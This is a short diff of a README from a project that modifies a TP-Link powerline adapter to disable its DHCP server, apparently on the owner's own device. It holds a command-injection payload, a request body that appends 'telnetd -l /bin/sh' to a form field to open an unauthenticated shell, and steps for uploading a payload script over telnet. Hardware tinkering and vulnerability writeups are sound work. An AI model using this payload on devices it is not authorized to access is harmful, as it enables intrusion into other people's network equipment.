iansw246/tl-wpa9610-mods/disable-dhcp/README.md

 -Body "operation=remove&key=1;telnetd -l /bin/sh"
 ```

 This exploits a command injection vulnerability in the http server code on the powerline to start a telnet server.
+Thanks to [this blog post](https://the-hyperbolic.com/posts/hacking-the-tlwpa4220-part-1/) from the hyperbolic for a great writeup about the vulnerability.

 4. Run `payload.sh` on the powerline via telnet by running on your local machine `upload-payload.sh`